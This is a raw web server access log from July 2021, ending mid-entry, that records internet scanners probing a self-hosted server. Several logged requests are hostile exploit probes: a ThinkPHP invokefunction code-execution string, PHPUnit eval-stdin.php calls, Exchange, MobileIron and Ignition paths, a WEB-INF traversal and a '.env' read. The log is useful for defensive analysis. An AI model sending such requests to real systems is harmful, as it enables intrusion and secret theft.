[20/Jul/2021:01:07:59 +0000] 400 - GET http 64.22.21.87 "/" [Client 192.241.218.193] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:01:57:32 +0000] 444 - GET https www.radarr.moralanimal.net "/" [Client 69.127.113.140] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [20/Jul/2021:03:22:05 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Jul/2021:03:25:29 +0000] 444 - GET https 87.21.22.64.aeneasdsl.com "/owa/auth/x.js" [Client 45.146.165.36] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [20/Jul/2021:03:25:30 +0000] 400 - GET http 87.21.22.64.aeneasdsl.com "/owa/auth/x.js" [Client 45.146.165.36] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [20/Jul/2021:04:27:18 +0000] 444 - GET https 64.22.21.87 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [20/Jul/2021:06:07:16 +0000] 444 - GET https 64.22.21.87 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [20/Jul/2021:06:18:15 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Jul/2021:07:54:42 +0000] 400 - - http localhost "-" [Client 185.202.2.36] [Length 154] [Gzip -] "-" "-" [20/Jul/2021:07:54:42 +0000] 400 - - http localhost "-" [Client 185.202.2.36] [Length 154] [Gzip -] "-" "-" [20/Jul/2021:09:08:36 +0000] 400 - GET https localhost "/9jCv" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [20/Jul/2021:09:32:52 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:09:39:42 +0000] 444 - GET https 64.22.21.87 "/" [Client 165.22.99.85] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Jul/2021:09:58:34 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:10:41:17 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [20/Jul/2021:11:28:20 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.219.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:13:30:06 +0000] 444 - GET https 64.22.21.87 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [20/Jul/2021:14:51:32 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Jul/2021:14:51:32 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Jul/2021:14:57:19 +0000] 444 - GET https 64.22.21.87 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [20/Jul/2021:15:55:07 +0000] 444 - GET https 64.22.21.87 "/" [Client 171.25.193.20] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [20/Jul/2021:15:55:14 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.152] [Length 0] [Gzip -] "-" "-" [20/Jul/2021:15:55:15 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.152] [Length 0] [Gzip -] "-" "-" [20/Jul/2021:15:55:16 +0000] 400 - - https localhost "-" [Client 23.129.64.152] [Length 154] [Gzip -] "-" "-" [20/Jul/2021:17:57:42 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.35.168.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:18:28:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Jul/2021:19:36:39 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:39 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:41 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:41 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:41 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:42 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:42 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:44 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:45 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [20/Jul/2021:19:36:47 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:19:36:48 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Jul/2021:21:06:06 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Jul/2021:21:06:06 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Jul/2021:21:06:06 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Jul/2021:21:06:06 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Jul/2021:21:06:06 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Jul/2021:21:06:06 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Jul/2021:21:09:18 +0000] 444 - GET https 64.22.21.87 "/ReportServer" [Client 192.241.206.227] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:21:51:26 +0000] 444 - GET https 64.22.21.87 "/login" [Client 192.241.206.234] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:22:47:12 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Jul/2021:22:59:51 +0000] 444 - GET https 64.22.21.87 "/" [Client 162.142.125.55] [Length 0] [Gzip -] "-" "-" [20/Jul/2021:22:59:52 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.55] [Length 252] [Gzip -] "-" "-" [20/Jul/2021:22:59:52 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.55] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [20/Jul/2021:23:19:22 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.203.111] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Jul/2021:04:22:26 +0000] 444 - GET https 64.22.21.87 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [21/Jul/2021:05:26:47 +0000] 444 - GET https 64.22.21.87 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [21/Jul/2021:06:52:52 +0000] 400 - GET http 64.22.21.87 "/config/getuser?index=0" [Client 199.195.252.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Jul/2021:08:06:43 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 144.86.173.65] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [21/Jul/2021:08:30:36 +0000] 444 - GET https 64.22.21.87 "/" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Jul/2021:09:34:53 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.223.27] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Jul/2021:10:29:07 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.83.67.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [21/Jul/2021:11:29:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.221.222] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Jul/2021:14:01:59 +0000] 444 - GET https 64.22.21.87 "/faces/javax.faces.resource/web.xml?loc=../WEB-INF" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [21/Jul/2021:14:57:52 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:53 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:54 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:55 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:56 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:56 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:57 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:58 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:57:58 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:58:01 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Jul/2021:14:58:01 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [21/Jul/2021:15:34:22 +0000] 444 - GET https 64.22.21.87 "//a2billing/customer/templates/default/footer.tpl" [Client 193.107.216.242] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64" "-" [21/Jul/2021:16:01:01 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Jul/2021:18:40:21 +0000] 444 - GET https 64.22.21.87 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [21/Jul/2021:18:40:22 +0000] 400 - GET http 64.22.21.87 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [21/Jul/2021:19:21:14 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 103.155.82.112] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [21/Jul/2021:19:38:30 +0000] 400 - HEAD http localhost "/" [Client 143.198.141.38] [Length 0] [Gzip -] "-" "-" [21/Jul/2021:19:38:35 +0000] 400 - GET http 64.22.21.87 "/system_api.php" [Client 143.198.141.38] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:35 +0000] 444 - GET https 64.22.21.87 "/system_api.php" [Client 143.198.141.38] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:35 +0000] 400 - GET http 64.22.21.87 "/c/version.js" [Client 143.198.141.38] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:36 +0000] 444 - GET https 64.22.21.87 "/c/version.js" [Client 143.198.141.38] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:36 +0000] 400 - GET http 64.22.21.87 "/streaming/clients_live.php" [Client 143.198.141.38] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:36 +0000] 444 - GET https 64.22.21.87 "/streaming/clients_live.php" [Client 143.198.141.38] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:37 +0000] 400 - GET http 64.22.21.87 "/stalker_portal/c/version.js" [Client 143.198.141.38] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:37 +0000] 444 - GET https 64.22.21.87 "/stalker_portal/c/version.js" [Client 143.198.141.38] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:37 +0000] 400 - GET http 64.22.21.87 "/stream/live.php" [Client 143.198.141.38] [Length 252] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [21/Jul/2021:19:38:38 +0000] 444 - GET https 64.22.21.87 "/stream/live.php" [Client 143.198.141.38] [Length 0] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [21/Jul/2021:19:38:38 +0000] 400 - GET http 64.22.21.87 "/flu/403.html" [Client 143.198.141.38] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:19:38:38 +0000] 444 - GET https 64.22.21.87 "/flu/403.html" [Client 143.198.141.38] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Jul/2021:21:09:48 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Jul/2021:21:09:48 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Jul/2021:21:09:48 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Jul/2021:21:09:48 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Jul/2021:21:09:48 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Jul/2021:21:09:48 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Jul/2021:22:45:58 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.84] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Jul/2021:23:21:21 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.223.191] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Jul/2021:00:13:43 +0000] 444 - GET https ag.win5858.in "/" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Jul/2021:00:13:51 +0000] 444 - GET https 64.22.21.87 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [22/Jul/2021:00:18:32 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Jul/2021:01:35:50 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:01:35:50 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:02:43:52 +0000] 400 - HEAD http localhost "/" [Client 178.128.18.110] [Length 0] [Gzip -] "-" "-" [22/Jul/2021:02:43:58 +0000] 400 - GET http 64.22.21.87 "/system_api.php" [Client 178.128.18.110] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:43:59 +0000] 444 - GET https 64.22.21.87 "/system_api.php" [Client 178.128.18.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:01 +0000] 400 - GET http 64.22.21.87 "/c/version.js" [Client 178.128.18.110] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:02 +0000] 444 - GET https 64.22.21.87 "/c/version.js" [Client 178.128.18.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:03 +0000] 400 - GET http 64.22.21.87 "/streaming/clients_live.php" [Client 178.128.18.110] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:04 +0000] 444 - GET https 64.22.21.87 "/streaming/clients_live.php" [Client 178.128.18.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:06 +0000] 400 - GET http 64.22.21.87 "/stalker_portal/c/version.js" [Client 178.128.18.110] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:06 +0000] 444 - GET https 64.22.21.87 "/stalker_portal/c/version.js" [Client 178.128.18.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [22/Jul/2021:02:44:08 +0000] 400 - GET http 64.22.21.87 "/stream/live.php" [Client 178.128.18.110] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [22/Jul/2021:02:44:09 +0000] 444 - GET https 64.22.21.87 "/stream/live.php" [Client 178.128.18.110] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [22/Jul/2021:03:08:06 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Jul/2021:03:13:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 154.209.125.7] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [22/Jul/2021:05:10:12 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:05:10:13 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:05:32:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 185.180.143.75] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [22/Jul/2021:05:32:03 +0000] 400 - GET http 64.22.21.87 "/" [Client 185.180.143.75] [Length 654] [Gzip -] "Mozilla/5.0 